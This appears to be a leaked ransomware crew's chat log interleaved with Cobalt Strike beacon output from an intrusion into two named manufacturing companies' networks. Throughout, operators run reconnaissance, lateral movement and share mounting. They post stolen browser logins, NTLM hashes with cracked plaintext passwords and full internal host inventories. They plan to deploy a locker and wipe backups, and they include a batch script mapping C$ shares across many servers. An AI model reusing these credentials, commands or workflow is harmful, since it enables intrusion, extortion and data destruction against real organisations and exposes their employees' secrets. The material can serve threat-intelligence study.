	cAddressAnswerLimit = 0
	dwRecursionRetry = 3
	dwRecursionTimeout = 8
	dwDsPollingInterval = 180
  Configuration Flags:
	fBootMethod = 3
	fAdminConfigured = 1
	fAllowUpdate = 1
	fDsAvailable = 1
	fAutoReverseZones = 1
	fAutoCacheUpdate = 0
	fSlave = 0
	fNoRecursion = 0
	fRoundRobin = 1
	fStrictFileParsing = 0
	fLooseWildcarding = 0
	fBindSecondaries = 0
	fWriteAuthorityNs = 0
	fLocalNetPriority = 1
  Aging Configuration:
	ScavengingInterval = 0
	DefaultAgingState = 1
	DefaultRefreshInterval = 168
	DefaultNoRefreshInterval = 168
  ServerAddresses:

	Ptr = 00000057578A8210
	MaxCount = 2
	AddrCount = 2
		Addr[0] => af=23, salen=28, [sub=0, flag=000000] p=13568, addr=fe80::1ea:20ef:8dbe:2e0
		Addr[1] => af=2, hall=16, [sub=0, flag=000000] p=13568, addr=10.1.247

  ListenAddresses:
 	NULL IP Array.
  Forwarders:

	Ptr = 00000057578A8C40
	MaxCount = 4
	AddrCount = 4
		Addr[0] => af=2, salen=16, [sub=0, flag=000000] p=13568, addr=64.83.1.10
		Addr[1] => af=2, hall=16, [sub=0, flag=000000] p=13568, addr=64.83.0.10
		Addr[2] => af=2, salen=16, [sub=0, flag=000000] p=13568, addr=209.218.44.2
		Addr[3] => af=2, hall=16, [sub=0, flag=00000000] p=13568, addr=209.125.133.6

	forward timeout = 3
	slave = 0
Command completed successfully.



``````
beacon> shell dnscmd gaproc.us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd gaproc.us.alloypolymers.com /info
[+] host called home, sent: 71 bytes
[+] received output:

Info query failed
    status = 1722 (0x000006ba)

Command failed: RPC_S_SERVER_UNAVAILABLE 1722 0x6BA

``мб он про dnscmd?может то я тыкал?Переснял сеабел``
  Entry : gaproc.us.alloypolymers.com
  Name : gaproc.us.alloypolymers.com
  Data : 192.168.1.121

  Entry: gaproc
  Name : gaproc.us.alloypolymers.com
  Data : 192.168.1.121

```в днс записях домен контроллеров тоже нету если его - скипаемя думаю даесли больше никак не проверить то скипаем его тогдачет ничего там не видно по ад его нетмб реально пережиток``
Teemo[WINDC2]SYSTEM */4284|20Dec25 01:04:37> portscan 192.168.3.0/24 1-10000
[Tasked beacon to scan ports 1-10000 on 192.168.3.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``оставим такугу``
Teemo[WINDC2]SYSTEM */4284|20Dec25 00:57:22> remote-exec psexec 89.0.10.104 tasklist
[Tasked beacon to run 'tasklist' on 89.0.10.104 via Service Control Manager
[+] host called home, sent: 1998 bytes
[-] Could not open service control manager on 89.0.10.104: 1728
``лишний раз шуметь не будемдоступы естьтам вроде бэкапы видныхотя хер с нима псек``
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:56:06> shell tasklist /v /s 89.0.10.104
[Tasked beacon to run: tasklist /v /s 89.0.10.104
[+] host called home, sent: 57 bytes
[+] received output:
ERROR: The RPC server is unavailable.
``сделайте сюда тоже скан на /24``
--- Chromium Credential (User: dch) ---
URL : http://192.168.3.254:5000/webman/login.cgi
Username : admin
Password : 11Dennis
```
такая хрень попадалась в браузере, через проксу пробовал зайти вообще не грузити еще @user7 а проверь нас tasklist /v /sпробегитесь по нимданые же выкачивали?нет, я уделял особое внимание линкам с доманом и ipвстречали туда пути?ребят, всю инфу что выгружали с тачек технареймне так же кажетсяблядство
может он ваще рудиментарный какой-то
пережиток прошлых веков``
[*] Tasked beacon to scan ports 135,139,445,80,443,8080,1433 on 192.168.1.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```да
давайте запортсканиможет пинг фильтроваться...и внц еще укажите + рдпна 135,139,445, веб порты и скульСо всехпроверьте /24``

Teemo[WINDC2]SYSTEM */4284|20Dec24 21:36:28> shell ping gaproc.us.alloypolymers.com -n 1
[*] Tasked beacon to run: ping gaproc.us.alloypolymers.com -n 1
[+] host called home, sent: 68 bytes
[+] received output:

Pinging gaproc.us.alloypolymers.com [192.168.1.121] with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.1.121:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

```а ты его с US пинговал?кхмотсканьте диапНе пингуеться(лол))
ну серьезно, где ты его заметил?ипак локального диапазона?Карты ТАРО указали путь)))он пингуется?
диап отсканирован куда он пингуется?а откуда по нему инфа?Его нет в трастах вообщевроде не в АДон в карантине?Есть еще траст к которому нет доступану вцелом поебатьхм
занятноЭто нет гир на линухенасколько я понимаю это НАС на урезанной винде?файлы свежиеШкола Сни северного)красавчикишикарно ребят)ну вот и славнолокер пройдется по нейЗапись естьесли работает - все отличнопроверьте запись в эту дирудайте скрин или листинг диры с размерами файловНе всегда на них диски расшарены, там в настройках можно просто выбрать папку для того что б от куда нужно клать бекапыминутучитаюя тутгуру приди@tl2призываем гуру @tl2там должны быть диски расшареныа хотя мб рано радуемсячестно сам удивлен)скасибо что сказал посмотреть, так бы ещё неделю бы ебались с ней )@tl2 посмотри на этоскорее всего у нее был доступтокен чей?под какой учеткой замапили?ну вы даетет е у вас все это время был доступ?хотя доступ и так былбля)в том то и дело что никак не сделали, ты сам сказал посмотреть нет вив а до этого момента мы искали креды от веб мордыкак?)вы сделали это?```
Teemo[WINDC2]SYSTEM */4284|20Dec25 00:32:40> shell net use * \\89.0.10.104\Documents
[Tasked beacon to run: net use * \\89.0.10.104\Documents
[+] host called home, sent: 64 bytes
[+] received output:
Drive Z: is now connected to \\89.0.10.104\Documents.

The command completed successfully.


Teemo[WINDC2]SYSTEM */4284|20Dec25 00:32:53> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \89.0.10.104\Documents Microsoft Windows Network
The command completed successfully.

``Do you have access to the balloon view?
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:29:28> shell net view \89.0.10.104 /all
[*] Tasked beacon to run: net view \\89.0.10.104 /all
[+] host called home, sent: 58 bytes
[+] received output:
Shared resources at \89.0.10.104

nas-D5-E2-B8

Share name Type Used as Comment

-------------------------------------------------------------------------------
Documents Disk Document folder
IPC$ IPC IPC Service ("nas-D5-E2-B8")
Music Disk Music folder
Pictures Disk Picture folder
Videos Disk Video folder
The command completed successfully.

``no viv nasa or what ?``and give net view \\hosdt /all can't find anything related to nasomnu how are you doing ?``I found another trust ``gaproc.us.alloypolymers.com`` but it is not availablesolidlydethey so successfully all on kmd5 passed ?
fc525c9683e8fe067095ba2ddc971889 Passw0rd!
7facdc498ed1680c4fd1448319a8c04f Password1!
876c802a60e4623dae480bf75d215bbc 11dchamh
083c3829383f6ce4bd61ee1135fa14cf qcqcqc1

``Check the @tl1`` Credits
winona.rtpco.local
Administrator c5cd921bd3aaaad70c0ee9e14bfe096c
dch 876c802a60e4623dae480bf75d215bbc
DEPCON 083c3829383f6ce4bd61ee1135fa14cf
``````

rtpco.local
Administrator 544599e93b8ab30d2a53ec48ce7ca6da
arobinsona fc525c9683e8fe067095ba2ddc971889 (Installed by many users)
cancelet 8669993c0b6f8d65cd206a0c9e1d598b
kaseyaservice d4e06b1ecf49e3d7932fba37fc6e96d5
O365Service 7facdc498ed1680c4fd1448319a8c04f
sagert 86517550f7c701dbb1f28f23a39fad9b
spicescan ca1484e694d5ca64dd6b59e3510d7f73
``good night''
7259ade8efc785abb4043e171e06b9c6 300SpartanS
88781646e2a2399370c54bae7f790e58 @d0nix
b4712f346339be917d4d9fe2ce3c387c barracuda
5acd3ae4a25e042cb01513ea9104b598 Barracuda
f97f8542534b19414d871e197d222747 Gutch@!!
960736ab56cfa8943d4de07ef142a730 boston
ae8e27dc85a2682037008ebe671655f0 afdljplw
b6c367027c0d73a755244ad52bda9a67 !nC0rr3ct
6c77565149af62e68bb41868d29ec47a d0n3g0n3
e9b57eb8af25befb91bda9b4ed95097c 11Saundra
a99a74eb78fc1f1ea3a89b53b7de7179 p@perm00n
b4712f346339be917d4d9fe2ce3c387c barracuda
26e7f39a25b859023e876293c37495e3 D33pw@ter
4df7f5cc8377559b058c30516ca88a30 sub@sh2005
06ee9928c5ebc952e0fc44e300ff821f c]st0m3r
5f6e5864d8622c481a233d9472f1b3a8 Gahann@
652805d304727fa73d6c4c7cfef31986 Calib3r9

``Till tomorrow''.
Administrator 66ac9a770e02cfdded6d5bd957a774fb
Angel 7259ade8efc785abb4043e171e06b9c6
adonixadmin 88781646e2a2399370c54bae7f790e58
alloyamms ab6be57f8c4cc213e70158f87953f45a
barracuda b4712f346339be917d4d9fe2ce3c387c
BarracudaBUP 5acd3ae4a25e042cb01513ea9104b598
bbuerck f97f8542534b19414d871e197d222747
BGW 960736ab56cfa8943d4de07ef142a730
CAncelet ae8e27dc85a2682037008ebe671655f0
canceleta b6c367027c0d73a755244ad52bda9a67
cevansa 6c77565149af62e68bb41868d29ec47a
citrix_svc 66ac9a770e02cfdded6d5bd957a774fb
DHaase e9b57eb8af25befb91bda9b4ed95097c
EntAdmin a99a74eb78fc1f1ea3a89b53b7de7179
gahbarracuda b4712f346339be917d4d9fe2ce3c387c
orgbarracuda 26e7f39a25b859023e876293c37495e3
sagert 86517550f7c701dbb1f28f23a39fad9b
Services_Backup 4df7f5cc8377559b058c30516ca88a30
Uptime 06ee9928c5ebc952e0fc44e300ff821f
veeam 5f6e5864d8622c481a233d9472f1b3a8
wstangea 652805d304727fa73d6c4c7cfef31986

The ``dropsession files in slipk 6okay then on tomorrow roll there logins(mail), with clears what is there([ ](https://mediaeveryone.com/group/rtpcompany-com?msg=eypQF6sQrBzHzsJKD) mail sootv from hell, or login accountswith @tl1 when we worked at ART for a long time, probably a good half of critical accesses from e-mails that were not on machines there and network diagrams and instructions on connections and keys and passwords e-mail is a treasure of information in many companies, he had to go under a proxy on the ADR to be routed to mycr and authorize there, and very often he flies through the mail to the microsoft site. Do you think he who passed the data on the posta here? there either the pass does not fit, or not created a box, or an empty mail, not a word about us and the ip and the hostname? in the mail all the clerks checked - empty you scan on subdomains `` ``
Subdomain IP address OS Server Technology Web Platform Page Title
autodiscover.rtpcompany.com 52.97.170.40 Sign in to Outlook
sip.rtpcompany.com 52.112.65.203 RTC 7.0
dns2.rtpcompany.com 63.219.151.12
vpn2.rtpcompany.com 64.213.220.250
ssl.rtpcompany.com 65.162.42.135
vpn.rtpcompany.com 65.162.42.173
wiki.rtpcompany.com 65.162.42.180
mail.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
mailhost.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
pop3.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
smtp.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
ts.rtpcompany.com 65.162.42.198
exchange.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
search.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
webmail.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
docs.rtpcompany.com 65.162.42.206 Windows Microsoft-IIS 7.5 ASP.NET IIS7
citrix.rtpcompany.com 65.162.42.222 Windows Microsoft-IIS 7.5 ASP.NET
web1.rtpcompany.com 65.162.42.241
beta.rtpcompany.com 65.162.42.241
asia.rtpcompany.com 65.162.42.246
dns4.rtpcompany.com 65.162.42.249
rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company
web.rtpcompany.com 65.162.42.250
ftp.rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company
home.rtpcompany.com 65.162.42.251 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319
public.rtpcompany.com 65.162.42.252 Windows Microsoft-IIS 7.5 ASP.NET public.rtpcompany.com
www.rtpcompany.com 167.71.108.192 PHP WordPress 5.6 RTP Company
fr.rtpcompany.com 204.248.115.14
es.rtpcompany.com 204.248.115.14
dns.rtpcompany.com 205.243.114.218
dns3.rtpcompany.com 208.94.147.135
data.rtpcompany.com 216.252.195.128 Windows Microsoft-IIS 7.5 ASP.NET 2.0.50727 Advanced Materials Search by Property, Composition, or Text
``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=nA3hZ2RS3fYvk3hP9) I'm just afraid to use it, after the obvious errors of other tools) throw the hashes of all YES quickly run them through kmd5sobot kredes domain
https://webmail.rtpcompany.com/owa/auth/logon.aspx
``alternative
https://exchange.rtpcompany.com/owa/auth/logon.aspx
``above mistake once disassemble the tool and we will be happy with the search of all mail@tl1 please, with mailsnapper dig `mail.rtpcompany.com ``rtpcompany.comThe computers that I came across offnut, I ngdeto seen a link to the domain mail, it must be found.
After that, I'll try to connectwhy not get a quick look now a quick look not to get into tomorrow during office hours did not look therepasswordpochtu? I think so yes it first did just in case)but google default root pass to port 22 for ReadyNAS hardly anyone goes there at all on ssh just bros, this is not a full-fledged lin
it's a nixlike system for haaS if there's only lin backups then just shred the server into zeros and fuck it
delete
lin don't get lost
```
Why can't i break it? just open the smb balloon and break it as you please. go through all available usernames, passwords + all vulnerabilities from the msf - no point in moving it to tomorrow? to try to find the data i need to check every arm and servicecloud. That's a long time.
89.0.1.6:445 (platform: 500 version: 5.0 name: MAINT domain: WORKGROUP)
 http://89.0.1.6/rtp/index.cfm
``````
Teemo[23L1]TOM/3608|2020Dec24 06:00:28> shell nslookup 89.0.10.104
[*] Tasked beacon to run: nslookup 89.0.10.104
[+] host called home, sent: 51 bytes
[+] received output:
Server: mndc2.rtpco.local
Address: 89.0.0.83

Name: nas-D5-E2-B8.rtpco.local
Address: 89.0.10.104

``````
URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx
Username : tom
Password : Passw0rd!

``Isn't the ip or hostname glowing in the admins' browsers?
[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)
Did you look for access? No, not in any domain ad users do not have geodunase if there is no files on the pc, maybe they did a search on NASnet/ And read the mail of admins?) Guys, we will search for a long time))) Give me a screenshot of the web admin
WINONA\TOM abcabc4
RTPCO\corr 00sthomas
RTPCO\pvcimpro 4qbuyh
RTPCO\rmiller 789)_+rm
RTPCO\dpflughoeft BabyYoda123
rtpco\administrator d0T73Rd!
WINONA\Administrator DA7PaM8h
DEPCONSG/administrator dropC
AXREMOTESRV\Administrator dropCod5
RTPCO\npaine Jsnp&524
WINONA\rmiller michael1
WINONA Color Plastics1
rtpco\bkouba PrayersNeeded2020!
RTPCO\lmiller Ronnie11
``Not wind?
beacon> portscan 89.0.10.104 1-10000 icmp 200
[*] Tasked beacon to scan ports 1-10000 on 89.0.10.104
[+] host called home, sent: 75365 bytes
[+] received output:
(ICMP) Target '89.0.10.104' is alive. [read 8 bytes]
89.0.10.104:10000

[+] received output:
89.0.10.104:8200

[+] received output:
89.0.10.104:5355

[+] received output:
89.0.10.104:3702

[+] received output:
89.0.10.104:443

[+] received output:
89.0.10.104:139
89.0.10.104:80

[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)

[+] received output:
89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
Scanner module is complete
Portscan in progressDefault combinations do not fitNow give portscanYou guys do not read the messages When do we start pulling? What will pull the servers to divide among themselves You decide what to do there?[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=abZxmjF9E8zPF4rJL) and this[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=rWw6TTnNd5ZKh7yGQ) took this [ ] (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
didn't come up YES LA as local admins
```
no access to folders on the NAS or did you try to authorize? no on the PC admins watched the rg files? re-checked all the Administrator did not fit YES LA as local admins and check the webcards YES / default for this NASa if no access - then log on 80/443 try to strange question))) lock it need)) access that is it? LA or DA some? @tl2 what do we do with us? 1) We are not broken into groups of servers
2) We're in the vorgsteins.
us.alloypolymers.com SERVER
ALLOYLICWEB: 10.1.1.238
ALLOYAPP3: 10.1.1.250
RICHMONDDC1: 10.1.1.248
RICHMONDDC2: 10.1.1.247
ALLOYAMMS: 10.1.1.231
GAH2K3SRV1: 10.1.10.40
GAHDC2: 10.1.10.81
ALLOYCRKT01: 10.1.5.250
CROCKETTDC1: 10.1.5.241
ALLOYORGAPP01: 10.1.8.11
ALLOYEXCH02: 10.1.1.240
ORANGEDC1: 10.1.8.248
ALLOYSQL01: 10.1.1.243
ALLOYXENAPP: 10.1.1.237
ALLOYAPP01: 10.1.1.251
RICHMONDSTORAGE: 10.1.1.245
OHPRINTSRV: 10.1.10.12
OHSPICEWORKS: 10.1.10.11
CROCKETTSTORAGE: 10.1.5.242
ALLOYWEB2: 10.1.8.210
GAHDC01: 10.1.10.82
ORANGESTORAGE: 10.1.8.245
ORGPRINTSRV: 10.1.8.246
CTXALLOYCONNECT: 10.1.1.221
``Just one more time, the avs have decided to bypass the inject all ready?
rtpco.local SERV
AXBATCH-TEST: 10.89.11.112
WINONAV1: 10.89.11.22
AXAOS-BUILD: 10.89.11.120
SAN-HQ: 10.89.11.35
AXDEV3: 10.89.11.103
AXDEV6: 10.89.11.106
MINITABLIC: 10.89.11.6
AXDEV1: 10.89.11.101
AXDEV2: 10.89.11.102
AXSQL-DEV: 10.89.11.118
TX-TESTSRV1: 10.58.0.166
MXSTORAGE: 10.13.0.14
SHENZDC1: 10.17.1.5
NVSTORAGE: 10.57.0.36
NEVADAHYPV1: 10.57.0.84
NVDC1: 10.57.0.32
SUZHOUDC2: 10.7.0.41
SUZHOUPRINTSRV: 10.7.0.21
SINGDC1: 10.5.0.4
SINGDC2: 10.5.0.5
SINGSTORAGE: 10.5.0.19
MNDC2: 89.0.0.81
``Yes, Captain''.
rtpco.local SERV.
CTXCONNECTOR2: 10.89.11.27
CTXCONNECTOR1: 10.89.11.26
SQLPROD1: 10.89.0.99
KASEYA: 10.89.11.24
CTXAPP3: 10.89.11.28
ONBASEPROD1: 10.89.11.7
ONBASETEST: 10.89.11.10
CTXAPP4: 10.89.11.11
ONBASETEST01: 10.89.11.33
WEBPROD01: 10.89.11.31
PDM01: 10.89.11.32
SOLARWINDS: 10.89.11.2
WINPAK01: 10.89.0.111
MAINTENANCE: 10.89.11.40
MNDC2: 89.0.0.83
STORAGEWINONA2: 10.89.11.14
AXFORMS-DEV: 10.89.11.111
EXCHANGE: 10.89.11.10
ADMT: 10.89.11.5
INDYDC1: 10.59.0.4
AXREPORTS-DEV: 10.89.11.121
AXAOS-TRAINING: 10.89.11.122
AXAOS-TEST: 10.89.11.123
``are you ready?
rtpco.local SERV
FRANCEDC1: 10.4.0.25
FRANCEDC2: 10.4.0.26
FRANCESTORAGE: 10.4.0.27
FRANCEPRINTSRV: 10.4.0.28
GERMANYDC1: 10.20.0.40
GERMANYDC2: 10.20.0.41
GERMANYSTORAGE: 10.20.0.42
FR-VIR2008-02: 10.4.0.19
FRANCESAGE: 10.4.0.100
FRANCEINTERMEC: 10.4.0.72
FRANCEARCHIVE: 10.4.0.10
DC1POLAND: 10.28.0.5
POLSTORAGE: 10.28.0.8
DC2POLAND: 10.28.0.6
MNDOMAIN6: 10.89.0.20
PV-PROD2: 10.89.0.87
PV-PROD1: 10.89.0.86
SNAP: 10.89.10.12
RTPADFS1: 89.0.0.191
VADC1: 10.56.0.30
VADC2: 10.56.0.31
CHILLER2: 10.89.10.11
VADC2: 10.56.0.35
``````

rtpco.local
25L27A: 89.0.191.55
30L107: 89.0.191.64
25L21: 172.22.200.26
BBDESK2: 89.0.192.80
26L19: 10.58.0.132
ADAM-DESKTOP: 89.0.192.87
23LL76: 89.0.192.189
UPS580: 89.0.191.216
24L11: 10.58.0.135
33LL67: 89.0.192.215
30L43: 89.0.192.45
28L4A: 89.0.192.6
27L24: 10.32.0.191
CNSZCYDGG13: 10.7.3.13
NB02B_RTPSZ: 10.17.4.40
CNSZD6RTNY02: 10.7.2.76
30L07: 89.0.191.137
TIS-RTP: 10.7.2.81
25L59: 89.0.191.46
26L47: 10.25.0.130
25L9: 89.0.191.43
25L42: 89.0.193.15
26L251: 10.32.1.188
30LL56: 89.0.191.172
32LL58: 10.58.58.91
CNSZD2M6RC3X: 10.7.2.106
DEPCON10B: 89.0.192.150
DEPCON10SG: 10.5.1.21
SG20160916-PC: 10.5.1.75
SG20190107-PC: 10.5.1.103
SUZHOU-JOLYN: 10.7.2.151
SG20140923-NB1: 10.5.1.131
30L30: 10.1.8.145
MXL5040QYD-1: 10.1.8.220
PRTMONITOR: 10.89.11.36
29LL22: 172.22.245.162
28LL50: 10.13.0.87
DEPCON10FR: 89.0.192.141
DENNIS15: 89.0.88.20
25L37: 89.0.192.47
DENNIS10: 10.33.255.253
31LL31: 89.0.203.201
30L24A: 10.1.5.208
26L14: 10.33.1.246
31LL35: 172.22.245.170
27L07: 89.0.191.57
27L09: 89.0.193.118
QATHERMAL: 89.0.191.80
CNSZN84WP433: 10.7.2.163
SG20171218-NB: 10.5.1.56


``````
rtpco.local
SG20170531-NB: 10.5.1.99
W10-FR2018-CYC: 10.4.1.13
30L75: 89.0.192.98
30L36: 10.1.8.143
26L48: 89.0.192.81
LUNCHROOM2: 89.0.6.100
28L18: 10.57.0.61
24L19: 172.22.200.18
BSDESKTOP: 89.0.10.101
23LL7: 10.12.1.7
31LL08: 172.22.200.48
USH832L0DT: 10.1.8.128
30L40: 89.0.191.147
RTP-FGY: 10.7.2.58
W10-F2014-PYBA: 10.4.1.103
29LL36: 172.22.245.170
SG20180424-PC: 10.5.1.53
26L7: 89.0.192.3
25L5: 172.22.200.62
CNSZ6K9ZJ13: 10.7.3.20
30L29: 10.1.8.157
27L28: 172.22.200.11
30L41: 89.0.191.245
25L3: 89.0.192.77
18L15: 172.22.200.11
27L06: 89.0.192.160
30L94: 10.59.0.156
30L14: 10.36.5.236
AVANITEN: 10.89.11.34
31LL42HR: 89.0.191.209
31LL19: 89.0.192.102
27L12: 10.56.0.166
26L05: 172.22.200.24
31LL36: 172.22.245.162
28L24: 10.57.0.85
28LL75: 172.22.200.29
30L54: 89.0.191.174
24L20: 172.22.245.137
RTP_SZ_ZPH: 10.17.4.14
SG2010018: 10.5.1.105
WIN7-2016-CHG: 10.28.0.100
28LL56: 89.0.192.215
30L47: 10.59.0.113
30L22: 10.1.5.151
AXUPS: 10.89.11.35
30L93: 10.59.0.106
26L59: 89.0.193.94
25L43: 172.22.200.66
30L10: 89.0.193.76



``````
rtpco.local
24L5: 10.33.2.239
30L96: 89.0.191.196
26L23: 10.58.0.156
30L65: 10.1.10.146
26L55: 10.56.0.118
SUZHOU-JANE: 10.7.2.136
28L19: 89.0.191.215
25L38: 89.0.192.172
30LL17: 89.0.203.201
22LL11: 10.33.1.254
32LL15: 89.0.203.204
26L29: 10.59.0.107
RTP_SZ_C1: 10.17.4.4
28L13: 10.57.0.63
30L59: 172.22.200.30
CNSZ6K0WJ13: 10.7.2.158
30L19: 89.0.192.127
27L14: 89.0.192.118
EQL-SAN2: 10.89.5.120
30L03: 10.36.6.234
30L51: 10.56.0.126
25L12: 89.0.193.67
METROMTRREADER: 89.0.191.183
29LL59: 89.0.203.201
30L21: 10.1.5.205
30L15: 172.22.200.16
29LL9: 10.1.8.104
30L100: 89.0.192.80
32LL62: 89.0.192.244
30L69: 89.0.192.35
VC1: 172.22.254.20
30L68: 89.0.191.58
30L98: 10.59.0.148
30L98: 10.59.0.148 30L92: 10.59.0.148 30L92: 10.89.11.3
32LL42: 89.0.192.239
CANCELET: 10.89.11.22
30LL29: 89.0.192.177
28L10: 89.0.191.39
23LL36: 172.22.200.48
26L07: 10.12.1.3
9.0.193.38
31LL40: 172.22.245.162
30L08: 10.58.0.154
32LL01: 89.0.203.201
30L85: 89.0.192.92
25L60: 89.0.193.101
26L56: 10.56.0.103
31LL22: 10.59.0.167
LTSIMBA1: 10.7.2.70

``````
rtpco.local
WININTERMEC32: 89.0.192.202
30L60: 89.0.192.78
30L44: 89.0.191.148
DCHDESKTOP: 89.0.88.18
ONBASESCAN: 10.89.11.23
GUARDSHAK: 89.0.191.99
30LL27: 10.8.1.240
DEPCON10DV: 89.0.192.142
26L15: 10.13.0.92
30L26: 10.1.5.203
28LL95: 172.22.245.137
RTP_SZ-PC1: 10.17.4.5
RTP_SZ_C: 10.17.4.22
28LL37: 172.22.245.162
W10-F2018-VIB: 10.4.1.46
ORION24: 89.0.191.71
28L16: 89.0.192.60
22L10INDY: 10.89.11.34
30L09: 10.32.1.231
26LL27: 172.22.200.11
30L102: 10.59.0.120
29LL32: 10.25.0.136
29LL57: 89.0.203.201
31LL45: 10.36.5.247
SUZHOU-ZOUWEI: 89.0.203.204
us.alloypolymers.com
USH313A07T: 10.1.5.81
MXL5040SMP: 10.1.5.38
5CG4503TXM: 10.1.5.46
GAHDC570005: 10.1.10.99
5CG5050LDQ: 10.1.10.155
MXL5040SMP-CRT: 10.1.5.43
SPICEWORKSRCH: 10.1.1.124
ALLOYHD01: 10.1.1.124
GAHHP2UA2450T7H: 10.1.10.184
2UA5032HTR: 10.1.10.120
25L51: 10.1.10.220
MXL5040QXR: 10.1.8.83
GAHELECT: 10.1.10.190
GAHWIN7HP6000: 10.1.10.226
5CG5050FL1: 10.1.8.129
U8H835L061: 10.1.8.58
25L63: 10.1.10.244
XNVR-1739997: 10.1.10.180
ORGREMOTEPW: 10.1.8.151
MXL5040QYR: 10.1.8.175
USH0360062: 10.1.10.167
26LL34: 10.1.10.196
USH539L1C1: 172.22.245.170
GAHPROD1: 10.1.10.122
LEASE25-PC: 10.1.10.185
26LL31: 10.1.10.145

``Checkbomb add /persist? If both show up, then cool add 2 hosts to this ipsa)``
@echo off
for /f %%i in (ips.txt) do (
	net use * \\%%i\C$ /persistent:yes
)
```
will it do that? or off with a batko kakim through the memory can take 100 servers per kobytes which kinda does not interfere in the case of 2fa on avmomo not yet pingingada now pinging all domains? total 200 servers? dunno how much interference, I generally quietly walk on their network how much interference? hmm, not a chance to bypass the inmemt in the cloud what is the administrator's browser?
2faSphere is`winona\tom,abcabc4`setg Proxies socks4:104.243.44.69:16219setg Proxies socks4:104.243.44.69:424181
2. kaseya
3. wargroups
  Name : Barracuda Orange Backup Server
    URL : http://10.1.8.14/auth/signin/

    Name : Barracuda Crockett Backup Server
    URL : http://10.1.5.44/auth/signin/
    
    Name : Barracuda Crockett Backup Server
    URL : http://10.1.5.34/auth/signin/

    Name : Barracuda Backup RCH
    URL : http://10.1.1.14/auth/signin/
    
    Name : ORG Barracuda Networks Login
    URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw.

    Name : CRT Barracuda Networks Login
    URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo.


``Antivirus.
Bekapyotnichat then write a list of current problems104.243.44.69:42418there's a splinter it kaseya.rtpcompany.com ``there's definitely kasper? There are some problems with kasper, is the rdp port open? The last problem? ``89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)`
on us it is not possible to get to us, it's too early to close so then everything is ready to close if the cresses rolled into the sphere? the first time there? all do proxy) `https://172.22.254.20/` yes, but the stupidity of the face opened it means you came? + without /websso.... at the root, what already toputput in the sphere? for the future all - always check the test method node and ip and on the hostname` ``
vc1.rtpco.local:5580
`` vc1.rtpco.local:5480
`` vc1.rtpco.local:636
vc1.rtpco.local:514
vc1.rtpco.local:443
vc1.rtpco.local:389
vc1.rtpco.local:88
vc1.rtpco.local:80
vc1.rtpco.local:22 (SSH-2.0-OpenSSH_7.4)
The first thing is to resolve the name of the proxy and then come in proxy can not do it in dnspo ip come in...omgscan ports webane opens (when you come in what does it say?
Teemo[MNDC2]SYSTEM */7388|2020Dec24 03:09:47> shell ping vc1.rtpco.local -n 1
[*] Tasked beacon to run: ping vc1.rtpco.local -n 1
[+] host called home, sent: 56 bytes
[+] received output:

Pinging vc1.rtpco.local [172.22.254.20] with 32 bytes of data:
Reply from 172.22.254.20: bytes=32 time<1ms TTL=63

Ping statistics for 172.22.254.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``this?``vc1.rtpco.local is dead
Teemo[WINDC2]SYSTEM */4284|2020Dec24 03:08:13> shell ping VMWAREMGR -n 1
[*] Tasked beacon to run: ping VMWAREMGR -n 1
[+] host called home, sent: 50 bytes
[+] received output:

Pinging VMWAREMGR.winona.rtpco.local [89.0.55.9] with 32 bytes of data:
Reply from 89.0.0.92: Destination host unreachable.

Ping statistics for 89.0.55.9:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

